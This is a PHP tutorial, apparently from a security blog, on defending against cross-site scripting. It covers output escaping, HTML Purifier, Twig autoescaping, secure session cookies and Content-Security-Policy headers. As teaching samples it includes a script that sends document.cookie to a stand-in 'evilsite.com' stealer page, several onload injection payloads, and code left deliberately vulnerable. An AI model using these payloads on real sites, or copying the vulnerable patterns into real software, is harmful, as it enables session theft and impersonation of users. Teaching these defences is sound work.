XSS vulnerabilities are very common in web applications. They're a special case of code injection attack; except where SQL injection, local/remote file inclusion, and OS command injection target the server, XSS exclusively targets the users of a website.
There are two main varieties of XSS vulnerabilities we need to consider when planning our defenses:
- Stored XSS occurs when data you submit to a website is persisted (on disk or in RAM) across requests, usually with the goal of executing when a privileged user access a particular web page.
- Reflective XSS occurs when a particular page can be used to execute arbitrary code, but it does not persist the attack code across multiple requests. Since an attacker needs to send a user to a specially crafted URL for the code to run, reflective XSS usually requires some social engineering to pull off.
- Steal your session identifier so they can impersonate you and access the web application.
- Redirect you to a phishing page that gathers sensitive information.
- Install malware on your computer (usually requires a 0day vulnerability for your browser and OS).
- Perform tasks on your behalf (i.e. create a new administrator account with the attacker's credentials).
Brief XSS Mitigation Guide
- If your framework has a templating engine that offers automatic contextual filtering, use that.
-
echo htmlspecialchars($string, ENT_QUOTES | ENT_HTML5, 'UTF-8');
is a safe and effective way to stop all XSS attacks on a UTF-8 encoded web page, but doesn't allow any HTML. - If your requirements allow you to use Markdown instead of HTML, don't use HTML.
- If you need to allow some HTML and aren't using a templating engine (see #1), use HTML Purifier.
What Does a XSS Vulnerability Look Like?
XSS vulnerabilities can occur in any place where information which can be altered by any user is included in the output of a webpage without being properly escaped.Example 1
<div id="profile"><?php echo $user['profile']; ?></div>
This is a potential stored XSS infection point (assuming the profile
field was pulled straight from the database without escaping). If the
malicious user is able to include a snippet that looks like this, they
can exploit any authenticated user that visits their profile and steal
their cookies for future impersonation efforts:<script>
window.open("http://evilsite.com/cookie_stealer.php?cookie=" + document.cookie, "_blank");
</script>
Example 2
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
The above snippet is vulnerable to reflective XSS attacks. Just trick a user into visiting /form.php?%22%20onload%3D%22alert(%27XSS%27)%3B
and they will see an alert box pop up containing the message 'XSS' when your page loads.<form action="/form.php?" onload="alert('XSS');" method="post">
Unlike SQL Injection, which prepared statements defeat 100% of the time, cross-site scripting doesn't have an industry standard strategy for separating data from instructions. You have to escape special characters to prevent attacks.
The Quick and Dirty XSS Mitigation Technique for PHP Applications
The simplest and most effective way to prevent XSS attacks is the nuclear option: Ruthlessly escape any character that can affect the structure of your document.For best results, you want to use the built-in
htmlspecialchars()
function that PHP offers instead of playing with string escaping yourself.<?php
/**
* Escape all HTML, JavaScript, and CSS
*
* @param string $input The input string
* @param string $encoding Which character encoding are we using?
* @return string
*/
function noHTML($input, $encoding = 'UTF-8')
{
return htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, $encoding);
}
echo '<h2 title="', noHTML($title), '">', $articleTitle, '</h2>', "\n";
echo noHTML($some_data), "\n";
The security of this construction depends on the presence of the ENT_QUOTES
flag when to escape HTML attribute values. It's important to note that this prevents any HTML characters in $some_data
from displaying on the web page.
Why ENT_QUOTES | ENT_HTML5
and 'UTF-8'
?
We specify ENT_QUOTES
to tell htmlspecialchars()
to escape quote characters ("
and '
). This is helpful for situations such as:<input type="text" name="field" value="<?php echo $escaped_value; ?>" />
If you failed to specify ENT_QUOTES
and attacker simply needs to pass " onload="malicious javascript code
as a value to that form field and presto, instant client-side code execution.We specify
ENT_HTML5
and 'UTF-8'
so htmlspecialchars()
knows what character set and version of the HTML standard to work with.The reason we need to specify both values is, as demonstrated against
mysql_real_escape_string()
, an incorrect (especially attacker-controlled) character encoding can defeat string-based escaping strategies.For the sake of safety and consistency, the encoding we specify here, the encoding sent in the
charset
attribute of the <meta>
tag, and the charset
added to the Content-Type
HTTP header should all match.Important - Avoid Premature Optimization
Always escape data on output (when displaying to a user).Do not escape user input against XSS attacks before inserting into a database. WordPress made this mistake and eventually security researcher Jouko Pynnönen of Klikki Oy realized MySQL column truncation can defeat before-insert XSS prevention strategies.
You should still be validating your input, however. If you're expecting an email address, make sure it's formatted like one.
$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL);
if ($email === false) {
// Not a valid email address! Handle this invalid input here.
}
If you're using MySQL, make sure any values going into a TEXT
field will fit in less than 64 KiB. MySQL will truncate TEXT
fields if any value exceeds that length, which can cause both security
issues (as WordPress experienced) as well as data integrity issues.The "escape all HTML entities" approach is secure and works wonderfully for situations where users should not be providing their own HTML markup. But what if you need to allow some markup, while not opening the door for any markup?
Put another way: How can we allow users to provide their own rich text markup without allowing them to execute arbitrary JavaScript in visitors' browsers?
Avoid HTML If You Can
An attractive solution is to adopt a rendering format such as BBCode, Markdown, or ReStructuredText instead of allowing raw HTML. This allows us to continue to reject all HTML entities while still allowing a limited subset markup options to make a user's contributions more expressive and powerful.If you can avoid accepting raw HTML by using another markup language such as Markdown, please do so. If you can bolt a WYSIWYG onto it for non-technical users, even better.
An Order of HTML Please, Hold the XSS Payload
Although we can easily stop all XSS attacks by preventing any HTML markup characters from breaking the document structure, this is often not the desired outcome. For some use cases (blog comments, user profiles, etc.) we want to allow our end users to be free to express themselves, within reason. But at the same time, we don't want users to be able to abuse this potential for customization to attack other users.How can we resolve this conflict? Simple: Use a library such as HTML Purifier. Most of the clever XSS tricks hidden in the HTML specification are easily defeated by HTMLPurifier, if used correctly.
How to Use HTMLPurifier to Stop XSS Attacks
Instead of attempting to naively search and replace malicious snippets in a string of user input, HTML Purifier digests the entire string as an HTML document, breaks it into tokens, and validates all elements and attributes against a whitelist and the RFC definitions for each attribute.<?php
/**
* Setup HTML Purifier
*/
require_once '/path/to/HTMLPurifier.auto.php';
$config = HTMLPurifier_Config::createDefault();
$htmlp = new HTMLPurifier($config);
/* etc. */
?>
<!-- etc etc etc. -->
<div id="profile"><?php
// Use HTML Purifier to prevent XSS in this user's profile
echo $htmlp->purify($user['profile']);
?></div>
Optimizing HTMLPurifier
Running HTML Purifier on every page load is a performance concern that can be easily fixed by caching. When you insert data into your database, keep the original values intact (e.g. for logging and threat intelligence purposes), but also store a purified version and use the purified HTML when displaying to end users.This "store, purify, cache, serve from cache" strategy allows you to enjoy the performance benefits developers normally get from filtering on input, but without causing a permanent loss of data. It also allows you to re-purify your original values in the event that you need to (e.g. if HTML Purifier has a bug with HTML5 output and they release a new version that fixes it).
$db->insert('blog_comments', [
/* Other fields */
'original_body' => $_POST['body'],
'rendered_body' => $htmlp->purify($_POST['body'])
]);
Important: When Not to Use HTML Purifier
HTML Purifier expects to operate in the context of an HTML document, not a string within an HTML attribute. The library isn't psychic. It cannot tell what the rest of the web page is doing immediately before and after the string you invoke it on an untrusted string.For example, even though it's using HTML Purifier, the following snippet is still insecure:
<img src="user.php?username=<?php echo $htmlp->purify($_GET['username']); ?>" />
Simply pass the string " onload="alert('XSS');
to username
and you have client-side code execution.When inserting any variables into another context, you should also run them through
htmlspecialchars()
(or noHTML()
above) to ensure they don't break out and add extra attributes to the parent element.This is safe:
<img src="user.php?username=<?php echo noHTML($htmlp->purify($_GET['username'])); ?>" />
This, too, is safe:<?php echo $htmlp->purify("<img src=\"user.php?username=".$_GET['username']."\" />"); ?>
As it turns out, context matters a lot for preventing cross-site scripting attacks.
What's secure in one context (e.g. HTML is allowed) could be disastrous
in other contexts (e.g. we're in the middle of an HTML attribute).What About Other Contexts?
We've uncovered two rules for preventing XSS attacks so far:- Always escape all HTML entities (i.e. with
noHTML()
defined above) when inserting data to an HTML attribute. - Always purify (i.e. with HTML Purifier) when you wish to allow safe HTML from the input string to appear in the rendered web page.
style
tag or attribute? What if we want to define a default value to a JavaScript variable?Context-Sensitive HTML Escaping in Template Engines
Every context within an HTML document requires distinct escaping rules that are not always relevant to other contexts. Fortunately, there's an easy way to tackle all this complexity without a great deal of effort or research: Use templating libraries.A popular PHP templating engine, Twig, makes contextual XSS filtering a walk in the park:
{% autoescape 'css' %}
<p style="color: {{ color|default('#0f0') }};">Test</p>
{% endautoescape %}
{% autoescape 'html' %}
{{ some_var }}
{{ not_user_provided|raw }}
<p class="{{ class|e('html_attr') }}">
<a href="/user/{{ username|e('url') }}">{{ username }}</a>
</p>
{% endautoescape %}
If you're using Twig, you should prefer wrapping entire sections in {% autoescape %}
blocks above applying |e
filters to every printed template variable. Not only does auto-escaping
make your code easier to read, but it prevents a single oversight from
becoming an entry point for an attacker with a malicious payload.Browser-Level XSS Mitigation
There are a number of security features supported by all modern web browsers that significantly reduce the impact of XSS vulnerabilities. Even if you manage to escape every variable you output, it would be a very good idea to use these features. We are going to focus on two: HTTPS-Only Cookies (which means HTTP-Only cookies which only transmit over TLS) and Content-Security-Policy headers.Secure Cookies
Any time you set a cookie in PHP, you should set bothhttpOnly
and secure
to true
. (This assumes your website is only accessible over HTTPS, which it should be.)Your session cookie should, especially, not be made available to Javascript. This can be achieved either through adding these lines to
php.ini
, or by setting them manually on every request:session.cookie_httponly = On
session.cookie_secure = On
Setting the session cookie parameters on every page load:session_set_cookie_params(
0, // Lifetime -- 0 means erase when browser closes
'/', // Which paths are these cookies relevant?
'.yourdomain.com', // Only expose this to which domain?
true, // Only send over the network when TLS is used
true // Don't expose to Javascript
);
session_start();
Content-Security-Policy headers
Content-Security-Policy
headers significantly reduce the
risk and impact of XSS attacks in modern browsers by specifying a
whitelist in the HTTP response headers which dictate what the HTTP
response body can do. They don't protect against an attacker capable of
modifying the source files on the server, but most real-world XSS
vulnerabilities will fail to execute if they are used properly.An example of a CSP header looks like this:
Content-Security-Policy: script-src 'self' https://ajax.googleapis.com https://www.google-analytics.com; child-src 'none'; object-src 'none'; upgrade-insecure-requests
HTML5 Rocks has a great introductory tutorial for Content-Security-Policy headers if you would like to learn more about writing them.Paragon Initiative Enterprise's CSP Compiler
Ever wanted to makeContent-Security-Policy
headers
easier to manage? Whether you'd rather just edit a JSON file than
remember the syntax of a CSP header, or if you'd rather build the
headers for a particular request programmatically (e.g. to use the
script-nonce feature), check out our MIT-licensed CSP Builder project.Summary
- Use
Content-Security-Policy
headers and HTTPS-only cookies. - Your first line of defense against XSS attacks should be filtering any tainted information before inserting them in the DOM not before storing it in a database.
- If you can avoid accepting actual HTML by opting for Markdown, etc. then don't accept HTML.
- If you're using a templating engine such as Twig, use
{% autoescape %}
directives and|e
filters where appropriate.{% autoescape %}
should be prioritized over escaping every variable. - If you're not using a templating engine and need to safely render user-provided HTML, use HTML Purifier. Feel free to leverage caching for optimization, but keep an intact copy on-hand.
- Otherwise, use
noHTML()
and leave nothing to chance.
No comments:
Post a Comment